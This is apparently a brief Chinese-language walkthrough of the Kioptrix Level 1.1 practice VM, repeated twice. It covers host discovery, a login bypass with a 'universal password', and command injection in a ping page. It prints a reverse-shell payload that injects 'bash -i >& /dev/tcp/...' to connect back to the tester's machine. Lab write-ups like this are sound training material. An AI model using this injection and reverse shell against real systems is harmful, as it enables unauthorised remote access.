Kioptrix Level 1.1
下载地址:
实战操作
netdiscover找到靶场IP:192.168.0.10
HTTP
浏览器访问80端口,看到一个登录界面。
用万能密码登录进去
登录进去之后,发现是一个ping IP功能,看到这个就可以知道有命令注入漏洞。
回显权限是apache
配置反弹shell,payload:0 | bash -i >& /dev/tcp/192.168.0.8/7777 0>&1
最后更新于
下载地址:
netdiscover找到靶场IP:192.168.0.10
浏览器访问80端口,看到一个登录界面。
用万能密码登录进去
登录进去之后,发现是一个ping IP功能,看到这个就可以知道有命令注入漏洞。
回显权限是apache
配置反弹shell,payload:0 | bash -i >& /dev/tcp/192.168.0.8/7777 0>&1
最后更新于